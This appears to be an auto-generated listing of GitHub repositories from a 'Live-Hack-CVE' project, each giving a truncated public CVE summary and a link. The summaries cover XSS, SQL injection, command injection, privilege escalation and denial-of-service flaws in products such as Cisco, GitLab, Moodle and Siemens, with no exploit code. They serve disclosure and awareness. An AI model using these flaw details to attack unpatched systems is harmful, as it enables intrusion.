**A vulnerability was found in Navetti PricePoint 4.6.0.0. It has been classified as problematic. This affects an unknown part. The manipulation leads to basic cross site scripting (Reflected). It is possible to initiate the attack remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20044](https://github.com/Live-Hack-CVE/CVE-2017-20044) create time: 2022-12-29T00:43:23Z

**A vulnerability has been found in Navetti PricePoint 4.6.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection (Blind). The attack can be launched remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20042](https://github.com/Live-Hack-CVE/CVE-2017-20042) create time: 2022-12-29T00:43:20Z

**A vulnerability was found in Navetti PricePoint 4.6.0.0 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting (Persistent). The attack may be launched remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommend CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20043](https://github.com/Live-Hack-CVE/CVE-2017-20043) create time: 2022-12-29T00:43:16Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an improper access control vulnerability. An unauthenticated attacker could leverage this vulnerability to elevate privileges in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21045](https://github.com/Live-Hack-CVE/CVE-2021-21045) create time: 2022-12-29T00:05:25Z

**It was found in Moodle before version 3.10.1, 3.9.4, 3.8.7 and 3.5.16 that it was possible for site administrators to execute arbitrary PHP scripts via a PHP include used during Shibboleth authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20187](https://github.com/Live-Hack-CVE/CVE-2021-20187) create time: 2022-12-29T00:05:56Z

**It was found in Moodle before version 3.10.1, 3.9.4, 3.8.7 and 3.5.16 that messaging did not impose a character limit when sending messages, which could result in client-side (browser) denial of service for users receiving very large messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20185](https://github.com/Live-Hack-CVE/CVE-2021-20185) create time: 2022-12-29T00:05:32Z

**Cross Site Scripting (XSS) vulnerability in New equipment page in EasyVista Service Manager 2018.1.181.1 allows remote attackers to run arbitrary code via the notes field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33231](https://github.com/Live-Hack-CVE/CVE-2021-33231) create time: 2022-12-29T00:01:54Z

**A vulnerability in the email parsing module Clam AntiVirus (ClamAV) Software versions 0.102.0, 0.101.4 and prior could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to inefficient MIME parsing routines that result in extremely long scan CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15961](https://github.com/Live-Hack-CVE/CVE-2019-15961) create time: 2022-12-29T01:33:50Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. The application incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component, which could allow attackers to execute commands directly on the operating system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7670](https://github.com/Live-Hack-CVE/CVE-2019-7670) create time: 2022-12-29T00:08:41Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. Improper validation of file extensions when uploading files could allow a remote authenticated attacker to upload and execute malicious applications within the application’s web root with root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7669](https://github.com/Live-Hack-CVE/CVE-2019-7669) create time: 2022-12-29T00:07:36Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. The application generates database backup files with a predictable name, and an attacker can use brute force to identify the database backup file name. A malicious actor can exploit this issue to download the database file and disclose login information, which can allow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7667](https://github.com/Live-Hack-CVE/CVE-2019-7667) create time: 2022-12-29T00:07:32Z

**Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri before version 1.11.0.rc4 there is an XXE vulnerability. XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the network, potentially enabli CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26247](https://github.com/Live-Hack-CVE/CVE-2020-26247) create time: 2022-12-29T01:33:54Z

**ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8973](https://github.com/Live-Hack-CVE/CVE-2020-8973) create time: 2022-12-29T01:33:40Z

**Out of bounds write in Intel(R) PROSet/Wireless WiFi products on Windows 10 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0569](https://github.com/Live-Hack-CVE/CVE-2020-0569) create time: 2022-12-29T01:33:27Z

**Improper input validation in BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0590](https://github.com/Live-Hack-CVE/CVE-2020-0590) create time: 2022-12-29T01:33:17Z

**A vulnerability has been identified in SIMATIC HMI Comfort Panels (incl. SIPLUS variants) (All versions < V16 Update 3a), SIMATIC HMI KTP Mobile Panels (All versions < V16 Update 3a), SINAMICS GH150 (All versions), SINAMICS GL150 (with option X30) (All versions), SINAMICS GM150 (with option X30) (All versions), SINAMIC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15798](https://github.com/Live-Hack-CVE/CVE-2020-15798) create time: 2022-12-29T01:32:56Z

**The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version, allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8976](https://github.com/Live-Hack-CVE/CVE-2020-8976) create time: 2022-12-29T01:27:24Z

**ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8975](https://github.com/Live-Hack-CVE/CVE-2020-8975) create time: 2022-12-29T01:27:20Z

**Jenkins Chaos Monkey Plugin 0.3 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to generate load and to generate memory leaks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2322](https://github.com/Live-Hack-CVE/CVE-2020-2322) create time: 2022-12-29T01:24:12Z

**supybot-fedora implements the command 'refresh', that refreshes the cache of all users from FAS. This takes quite a while to run, and zodbot stops responding to requests during this time. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15853](https://github.com/Live-Hack-CVE/CVE-2020-15853) create time: 2022-12-29T00:52:27Z

**In OSIsoft PI System multiple products and versions, a remote, unauthenticated attacker could crash PI Network Manager service through specially crafted requests. This can result in blocking connections and queries to PI Data Archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10604](https://github.com/Live-Hack-CVE/CVE-2020-10604) create time: 2022-12-29T00:43:47Z

**The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10148](https://github.com/Live-Hack-CVE/CVE-2020-10148) create time: 2022-12-29T00:43:44Z

**An Improper Access Control vulnerability in the logging component of Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.23.320 allows a regular user to learn the scanning exclusion paths. This issue was discovered during external security research. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15279](https://github.com/Live-Hack-CVE/CVE-2020-15279) create time: 2022-12-29T00:42:48Z

**A security flaw was found in Ansible Tower when requesting an OAuth2 token with an OAuth2 application. Ansible Tower uses the token to provide authentication. This flaw allows an attacker to obtain a refresh token that does not expire. The original token granted to the user still has access to Ansible Tower, which allo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10709](https://github.com/Live-Hack-CVE/CVE-2020-10709) create time: 2022-12-29T00:42:45Z

**A flaw was found in Red Hat Satellite's Job Invocation, where the "User Input" entry was not properly restricted to the view. This flaw allows a malicious Satellite user to scan through the Job Invocation, with the ability to search for passwords and other sensitive data. This flaw affects tfm-rubygem-foreman_ansible v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10716](https://github.com/Live-Hack-CVE/CVE-2020-10716) create time: 2022-12-29T00:42:42Z

**An incomplete fix was found for the fix of the flaw CVE-2020-1733 ansible: insecure temporary directory when running become_user from become directive. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10744](https://github.com/Live-Hack-CVE/CVE-2020-10744) create time: 2022-12-29T00:42:38Z

**In Presto before version 337, authenticated users can bypass authorization checks by directly accessing internal APIs. This impacts Presto server installations with secure internal communication configured. This does not affect installations that have not configured secure internal communication, as these installations CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15087](https://github.com/Live-Hack-CVE/CVE-2020-15087) create time: 2022-12-29T00:12:02Z

**In Synergy before version 1.12.0, a Synergy server can be crashed by receiving a kMsgHelloBack packet with a client name length set to 0xffffffff (4294967295) if the servers memory is less than 4 GB. It was verified that this issue does not cause a crash through the exception handler if the available memory of the Serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15117](https://github.com/Live-Hack-CVE/CVE-2020-15117) create time: 2022-12-29T00:11:58Z

**In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the `TokenRevocationHandler` ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15223](https://github.com/Live-Hack-CVE/CVE-2020-15223) create time: 2022-12-29T00:11:48Z

**PackageKit's apt backend mistakenly treated all local debs as trusted. The apt security model is based on repository trust and not on the contents of individual files. On sites with configured PolicyKit rules this may allow users to install malicious packages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16122](https://github.com/Live-Hack-CVE/CVE-2020-16122) create time: 2022-12-29T00:11:38Z

**A vulnerability was found in Moodle where users with "Log in as" capability in a course context (typically, course managers) may gain access to some site administration capabilities by "logging in as" a System manager. This affects 3.9 to 3.9.1, 3.8 to 3.8.4, 3.7 to 3.7.7, 3.5 to 3.5.13 and earlier unsupported versions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25629](https://github.com/Live-Hack-CVE/CVE-2020-25629) create time: 2022-12-29T00:11:21Z

**A vulnerability has been identified in PCS neo (Administration Console) (All versions < V3.1), TIA Portal (V15, V15.1 and V16). Manipulating certain files in specific folders could allow a local attacker to execute code with SYSTEM privileges. The security vulnerability could be exploited by an attacker with a valid ac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25238](https://github.com/Live-Hack-CVE/CVE-2020-25238) create time: 2022-12-29T00:11:17Z

**The MSI installer in Verint Desktop Resources 15.2 allows an unprivileged local user to elevate their privileges during install or repair. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12744](https://github.com/Live-Hack-CVE/CVE-2020-12744) create time: 2022-12-29T00:11:14Z

**By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25193](https://github.com/Live-Hack-CVE/CVE-2020-25193) create time: 2022-12-29T00:11:11Z

**Some versions of Sonos One (1st and 2nd generation) allow partial or full memory access via attacker controlled hardware that can be attached to the Mini-PCI Express slot on the motherboard that hosts the WiFi card on the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9285](https://github.com/Live-Hack-CVE/CVE-2020-9285) create time: 2022-12-29T00:10:19Z

**Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25184](https://github.com/Live-Hack-CVE/CVE-2020-25184) create time: 2022-12-29T00:10:05Z

**A relative path traversal attack in the B. Braun Melsungen AG SpaceCom Version L81/U61 and earlier, and the Data module compactplus Versions A10 and A11 allows attackers with service user privileges to upload arbitrary files. By uploading a specially crafted tar file an attacker can execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25150](https://github.com/Live-Hack-CVE/CVE-2020-25150) create time: 2022-12-29T00:10:01Z

**Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24433](https://github.com/Live-Hack-CVE/CVE-2020-24433) create time: 2022-12-29T00:09:58Z

**Adobe Acrobat Reader for Android version 20.6.2 (and earlier) does not properly restrict access to directories created by the application. This could result in disclosure of sensitive information stored in databases used by the application. Exploitation requires a victim to download and run a malicious application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24441](https://github.com/Live-Hack-CVE/CVE-2020-24441) create time: 2022-12-29T00:09:54Z

**The vulnerability have been reported to affect earlier versions of QTS. If exploited, this improper access control vulnerability could allow attackers to compromise the security of the software by gaining privileges, or reading sensitive information. This issue affects: QNAP Systems Inc. Helpdesk versions prior to 3.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2506](https://github.com/Live-Hack-CVE/CVE-2020-2506) create time: 2022-12-29T00:09:51Z

**A Denial Of Service vulnerability in the apollo_upload_server Ruby gem in GitLab CE/EE all versions starting from 11.9 before 14.0.9, all versions starting from 14.1 before 14.1.4, and all versions starting from 14.2 before 14.2.2 allows an attacker to deny access to all users via specially crafted requests to the apol CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39880](https://github.com/Live-Hack-CVE/CVE-2021-39880) create time: 2022-12-29T01:34:32Z

**Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin <= 4.8.6 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36833](https://github.com/Live-Hack-CVE/CVE-2021-36833) create time: 2022-12-29T01:33:47Z

**October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-26231 (fixed in 1.0.470/471 and 1.1.1) was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247. An authenticated backend user with the `cms.manage_pages`, `cms.manage_layouts`, or `cms.ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21264](https://github.com/Live-Hack-CVE/CVE-2021-21264) create time: 2022-12-29T01:33:43Z

**angular-expressions is "angular's nicest part extracted as a standalone module for the browser and node". In angular-expressions before version 1.1.2 there is a vulnerability which allows Remote Code Execution if you call "expressions.compile(userControlledInput)" where "userControlledInput" is text that comes from use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21277](https://github.com/Live-Hack-CVE/CVE-2021-21277) create time: 2022-12-29T01:33:37Z

**A vulnerability has been identified in RUGGEDCOM RM1224 (All versions >= V4.3 and < V6.4), SCALANCE M-800 (All versions >= V4.3 and < V6.4), SCALANCE S615 (All versions >= V4.3 and < V6.4), SCALANCE SC-600 Family (All versions >= V2.0 and < V2.1.3), SCALANCE XB-200 (All versions < V4.1), SCALANCE XC-200 (All versions < CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25667](https://github.com/Live-Hack-CVE/CVE-2021-25667) create time: 2022-12-29T01:33:03Z

**A vulnerability has been identified in SIMATIC PCS 7 V8.2 (All versions), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP3 UC04), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP1), SIMATIC WinCC V15 and earlier (All versions < V15 SP1 Update 7), SIMATIC WinCC V16 (All versions < V16 Update 5), SIMATIC WinCC V17 (All versions < V CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40358](https://github.com/Live-Hack-CVE/CVE-2021-40358) create time: 2022-12-29T01:33:00Z

**Beijing Feishu Technology Co., Ltd Feishu v3.40.3 was discovered to contain an untrusted search path vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3305](https://github.com/Live-Hack-CVE/CVE-2021-3305) create time: 2022-12-29T00:53:24Z

**TensorFlow is an open source platform for machine learning. In affected versions TensorFlow's `saved_model_cli` tool is vulnerable to a code injection as it calls `eval` on user supplied strings. This can be used by attackers to run arbitrary code on the plaform where the CLI tool runs. However, given that the tool is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41228](https://github.com/Live-Hack-CVE/CVE-2021-41228) create time: 2022-12-29T00:48:44Z

**TensorFlow is an open source platform for machine learning. In affected versions the code behind `tf.function` API can be made to deadlock when two `tf.function` decorated Python functions are mutually recursive. This occurs due to using a non-reentrant `Lock` Python object. Loading any model which contains mutually re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41213](https://github.com/Live-Hack-CVE/CVE-2021-41213) create time: 2022-12-29T00:48:41Z

**TensorFlow is an open source platform for machine learning. In affected versions an attacker can trigger undefined behavior, integer overflows, segfaults and `CHECK`-fail crashes if they can change saved checkpoints from outside of TensorFlow. This is because the checkpoints loading infrastructure is missing validation CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41203](https://github.com/Live-Hack-CVE/CVE-2021-41203) create time: 2022-12-29T00:48:38Z

**ECOA BAS controller suffers from an arbitrary file write and path traversal vulnerability. Using the POST parameters, unauthenticated attackers can remotely set arbitrary values for location and content type and gain the possibility to execute arbitrary code on the affected device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41290](https://github.com/Live-Hack-CVE/CVE-2021-41290) create time: 2022-12-29T00:42:55Z

**A vulnerability in the XSI-Actions interface of Cisco BroadWorks Application Server could allow an authenticated, remote attacker to access sensitive information on an affected system. This vulnerability is due to improper input validation and authorization of specific commands that a user can execute within the XSI-Ac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1562](https://github.com/Live-Hack-CVE/CVE-2021-1562) create time: 2022-12-29T00:07:59Z

**A vulnerability in the fabric infrastructure file system access control of Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an authenticated, local attacker to read arbitrary files on an affected system. This vulnerability is due to improper access control. An attacke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1583](https://github.com/Live-Hack-CVE/CVE-2021-1583) create time: 2022-12-29T00:07:56Z

**A vulnerability in an API endpoint of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Application Policy Infrastructure Controller (Cloud APIC) could allow an unauthenticated, remote attacker to read or write arbitrary files on an affected system. This vulnerability is due to improper access c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1577](https://github.com/Live-Hack-CVE/CVE-2021-1577) create time: 2022-12-29T00:07:53Z

**A vulnerability in the disaster recovery feature of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain unauthorized access to user credentials. This vulnerability exists because access to API endpoints is not properly restricted. An attacker could exploit this vulnerability by sending a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1589](https://github.com/Live-Hack-CVE/CVE-2021-1589) create time: 2022-12-29T00:07:42Z

**A vulnerability in the implementation of a CLI command in Cisco Aironet Access Points (AP) could allow an authenticated, local attacker to overwrite files in the flash memory of the device. This vulnerability is due to insufficient input validation for a specific command. An attacker could exploit this vulnerability by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1423](https://github.com/Live-Hack-CVE/CVE-2021-1423) create time: 2022-12-29T00:07:29Z

**A vulnerability in the SIP inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a crash and reload of an affected device, resulting in a denial of service (DoS) condition.The vulnerability is due CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1501](https://github.com/Live-Hack-CVE/CVE-2021-1501) create time: 2022-12-29T00:07:26Z

**A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands with root privileges on the underlying operating system of an affected device that is running in multi-instance mode. This vulnerability is due to insufficient validatio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1448](https://github.com/Live-Hack-CVE/CVE-2021-1448) create time: 2022-12-29T00:07:10Z

**Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1506](https://github.com/Live-Hack-CVE/CVE-2021-1506) create time: 2022-12-29T00:07:06Z

**A vulnerability in Cisco SD-WAN vManage Software could allow an unauthenticated, adjacent attacker to gain access to sensitive information. This vulnerability is due to improper access controls on API endpoints when Cisco SD-WAN vManage Software is running in multi-tenant mode. An attacker with access to a device that CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1515](https://github.com/Live-Hack-CVE/CVE-2021-1515) create time: 2022-12-29T00:07:03Z

**A vulnerability in the boot logic of Cisco Access Points Software could allow an authenticated, local attacker to execute unsigned code at boot time. The vulnerability is due to an improper check that is performed by the area of code that manages system startup processes. An attacker could exploit this vulnerability by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1449](https://github.com/Live-Hack-CVE/CVE-2021-1449) create time: 2022-12-29T00:06:46Z

**A vulnerability in the FlexConnect Upgrade feature of Cisco Aironet Series Access Points Software could allow an unauthenticated, remote attacker to obtain confidential information from an affected device. This vulnerability is due to an unrestricted Trivial File Transfer Protocol (TFTP) configuration. An attacker coul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1437](https://github.com/Live-Hack-CVE/CVE-2021-1437) create time: 2022-12-29T00:06:42Z

**Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for MacOS, and Cisco Jabber for mobile platforms could allow an attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1469](https://github.com/Live-Hack-CVE/CVE-2021-1469) create time: 2022-12-29T00:06:39Z

**A flaw was found in cifs-utils in versions before 6.13. A user when mounting a krb5 CIFS file system from within a container can use Kerberos credentials of the host. The highest threat from this vulnerability is to data confidentiality and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20208](https://github.com/Live-Hack-CVE/CVE-2021-20208) create time: 2022-12-29T00:06:32Z

**A flaw was found in ImageMagick in versions before 7.0.11. A potential cipher leak when the calculate signatures in TransformSignature is possible. The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20313](https://github.com/Live-Hack-CVE/CVE-2021-20313) create time: 2022-12-29T00:06:20Z

**In Weidmüller u-controls and IoT-Gateways in versions up to 1.12.1 a network port intended only for device-internal usage is accidentally accessible via external network interfaces. By exploiting this vulnerability the device may be manipulated or the operation may be stopped. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20999](https://github.com/Live-Hack-CVE/CVE-2021-20999) create time: 2022-12-29T00:06:17Z

**A flaw was found in spice in versions before 0.14.92. A DoS tool might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20201](https://github.com/Live-Hack-CVE/CVE-2021-20201) create time: 2022-12-29T00:06:13Z

**AEM's Cloud Service offering, as well as versions 6.5.7.0 (and below), 6.4.8.3 (and below) and 6.3.3.8 (and below) are affected by an Improper Access Control vulnerability. An unauthenticated attacker could leverage this vulnerability to cause an application denial-of-service in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21083](https://github.com/Live-Hack-CVE/CVE-2021-21083) create time: 2022-12-29T00:06:10Z

**An insecure modification flaw in the /etc/passwd file was found in the openjdk-1.8 and openjdk-11 containers. This flaw allows an attacker with access to the container to modify the /etc/passwd and escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20264](https://github.com/Live-Hack-CVE/CVE-2021-20264) create time: 2022-12-29T00:06:06Z

**An Improper Access Control Vulnerability in the SMA100 series leads to multiple restricted management APIs being accessible without a user login, potentially exposing configuration meta-data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20050](https://github.com/Live-Hack-CVE/CVE-2021-20050) create time: 2022-12-29T00:06:03Z

**A lack of length validation in Snippet descriptions in GitLab CE/EE affecting all versions prior to 15.1.6, 15.2 prior to 15.2.4 and 15.3 prior to 15.3.2 allows an authenticated attacker to create a maliciously large Snippet which when requested with or without authentication places excessive load on the server, potent CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2592](https://github.com/Live-Hack-CVE/CVE-2022-2592) create time: 2022-12-29T01:34:53Z

**An issue in Incident Timelines has been discovered in GitLab CE/EE affecting all versions starting from 14.9 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2.which allowed an authenticated attacker to inject arbitrary content. A victim interacting with this con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2527](https://github.com/Live-Hack-CVE/CVE-2022-2527) create time: 2022-12-29T01:34:50Z

**An attacker can pre-create the `/Applications/Google\ Drive.app/Contents/MacOS` directory which is expected to be owned by root to be owned by a non-root user. When the Drive for Desktop installer is run for the first time, it will place a binary in that directory with execute permissions and set its setuid bit. Since CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3421](https://github.com/Live-Hack-CVE/CVE-2022-3421) create time: 2022-12-29T01:34:46Z

**A business logic issue in the handling of large repositories in all versions of GitLab CE/EE from 10.0 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2 allowed an authenticated and authorized user to exhaust server resources by importing a malicious project. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2455](https://github.com/Live-Hack-CVE/CVE-2022-2455) create time: 2022-12-29T01:34:39Z

**A crafted tag in the Jupyter Notebook viewer in GitLab EE/CE affecting all versions before 15.1.6, 15.2 to 15.2.4, and 15.3 to 15.3.2 allows an attacker to issue arbitrary HTTP requests CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2428](https://github.com/Live-Hack-CVE/CVE-2022-2428) create time: 2022-12-29T01:34:36Z

**Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29581](https://github.com/Live-Hack-CVE/CVE-2022-29581) create time: 2022-12-29T01:34:01Z

**A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30525](https://github.com/Live-Hack-CVE/CVE-2022-30525) create time: 2022-12-29T01:33:57Z

**kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller\ Filecontroller.java. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42147](https://github.com/Live-Hack-CVE/CVE-2022-42147) create time: 2022-12-29T01:33:34Z

**When a user opens manipulated JPEG 2000 (.jp2, jp2k.x3d) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user until restart of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32239](https://github.com/Live-Hack-CVE/CVE-2022-32239) create time: 2022-12-29T01:33:30Z

**** DISPUTED ** Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok. NOTE: the vendor disputes this because input to the Pebble templating engine is intended to include arbitrary Java code, and thus either the input should not arrive from an untr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37767](https://github.com/Live-Hack-CVE/CVE-2022-37767) create time: 2022-12-29T01:33:24Z

**Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42143](https://github.com/Live-Hack-CVE/CVE-2022-42143) create time: 2022-12-29T01:33:20Z

**The function `OCSP_basic_verify` verifies the signer certificate on an OCSP response. In the case where the (non-default) flag OCSP_NOCHECKS is used then the response will be positive (meaning a successful verification) even in the case where the response signing certificate fails to verify. It is anticipated that most CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1343](https://github.com/Live-Hack-CVE/CVE-2022-1343) create time: 2022-12-29T01:33:13Z

